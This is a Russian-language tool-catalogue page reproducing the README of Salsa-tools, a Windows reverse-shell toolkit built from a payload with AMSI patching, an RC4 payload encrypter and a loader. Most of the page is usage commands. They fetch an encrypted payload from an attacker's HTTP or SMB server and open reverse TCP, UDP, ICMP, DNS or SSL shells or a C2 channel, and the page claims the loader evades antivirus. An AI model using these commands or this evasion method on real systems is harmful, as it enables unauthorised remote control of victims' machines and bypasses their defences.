Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/hackplayers/salsa-tools
Повышение привилегийИнструменты шифрования/дешифрованияЭксплуатацияОбход IDS/IPSЛатеральное перемещениеШелл-кодПост-эксплуатацияКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubhackplayers/salsa-tools

Salsa-tools

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY и обход AV, патч AMSI

Репозиторий
587130576 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

License

   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools - Безопасный от AV обратный шелл, обмакнутый в соус bellota

Salsa Tools — это набор из трёх различных инструментов, которые в совокупности позволяют получить обратный шелл с расширенными возможностями в любой среде Windows без необходимости использования PowerShell для его выполнения. Чтобы обойти новейшие методы обнаружения (AMSI), большинство компонентов изначально были написаны на C#. Salsa Tools был публично выпущен Луисом Вакасом во время его доклада «Inmersión en la explotación tiene rima», который прошёл на конференции h-c0n 9 февраля 2019 года.

Особенности

* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* Безопасность от AV (17 февраля)
* Патчеры AMSI
* Выполнение PowerShell 
* ...

Обзор

Salsa-Tools состоит из трёх различных ингредиентов: - EvilSalsa - EncrypterAssembly - SalseoLoader И его поведение следующее:

Настройка

Требования

  • Visual Studio 2017 (или аналогичная)
    • Зависимости Microsoft.PowerShell.3.ReferenceAssemblies при компиляции под .NET 4.0
    • Зависимости Microsoft.PowerShell.2.ReferenceAssemblies при компиляции под .NET 3.5
  • Python 2.7

Запуск Salsa

Готовим EvilSalsa

   ___ __ __  ____  _            
  /  _]  |  ||    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] Это наша полезная нагрузка
                                 

EvilSalsa — ключевой ингредиент этого рецепта. Он содержит полезную нагрузку, которая выполняется в системе следующим образом: как только нагрузка запускается, она загружает System.Management.Automation.dll, который создаёт runspace. Внутри этого runspace у нас есть четыре типа оболочек (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). После загрузки EvilSalsa первым делом проверяется наличие c:\windows\system32\amsi.dll. Если он существует, он патчится с помощью домашней вариации обходов CyberArk и Rastamouse.

Смешиваем EncrypterAssembly и Evilsalsa

  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] Программа, шифрующая полезную нагрузку с помощью RC4
 [+] Есть версия на Python и версия в виде .exe

EncrypterAssembly можно использовать как Python-скрипт или как исполняемый файл. Он шифрует ранее сгенерированный EvilSalsa.

Использование в Python:

python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

Исполняемый файл:

Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Подаём зашифрованный EvilSalsa на стол с помощью SalseoLoader

SalseoLoader отвечает за загрузку зашифрованной полезной нагрузки. Может быть скомпилирован как библиотека или как исполняемый файл. Если он запускается как исполняемый файл, необходимые аргументы должны быть указаны при запуске. Если он скомпилирован как библиотека, должен быть экспортирован дескриптор "main". Аргументы передаются через переменные окружения.

  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             Автор: CyberVaca@HackPlayers

[+] Использование:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C

[+] Доступные полезные нагрузки:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

Учебное пособие

Компиляция двоичных файлов

Скачайте исходный код из репозитория GitHub и скомпилируйте EvilSalsa и SalseoLoader. Для компиляции кода вам потребуется установленная Visual Studio.

Скомпилируйте эти проекты для архитектуры той Windows-машины, где вы будете их использовать (если Windows поддерживает x64, компилируйте для этой архитектуры).

Вы можете выбрать архитектуру в Visual Studio на вкладке "Build" слева в поле "Platform Target".

(Если вы не можете найти эти параметры, нажмите на вкладку "Project", затем " Properties")

Затем соберите оба проекта (Build -> Build Solution). В журнале появится путь к исполняемому файлу:

Подготовка бэкдора

Прежде всего, вам нужно закодировать EvilSalsa.dll. Для этого можно использовать Python-скрипт encrypterassembly.py или скомпилировать проект EncrypterAssembly.

Python

python EncrypterAssembly/encrypterassembly.py <ФАЙЛ> <ПАРОЛЬ> <ВЫХОДНОЙ_ФАЙЛ>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <ФАЙЛ> <ПАРОЛЬ> <ВЫХОДНОЙ_ФАЙЛ>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Отлично, теперь у вас есть всё необходимое для запуска всей этой сальсы: закодированный EvilSalsa.dll и бинарник SalseoLoader. Загрузите бинарник SalseoLoader.exe на машину. Он не должен обнаруживаться ни одним антивирусом...

Запуск бэкдора

Получение TCP-обратного шелла (загрузка закодированной DLL через HTTP)

Не забудьте запустить nc как слушатель для обратного шелла и HTTP-сервер для раздачи закодированного evilsalsa.

SalseoLoader.exe password http://<IP-атакующего>/evilsalsa.dll.txt reversetcp <IP-атакующего> <Порт>

Получение UDP-обратного шелла (загрузка закодированной DLL через SMB)

Не забудьте запустить nc как слушатель для обратного шелла и SMB-сервер для раздачи закодированного evilsalsa (impacket-smbserver).

Скачать инструмент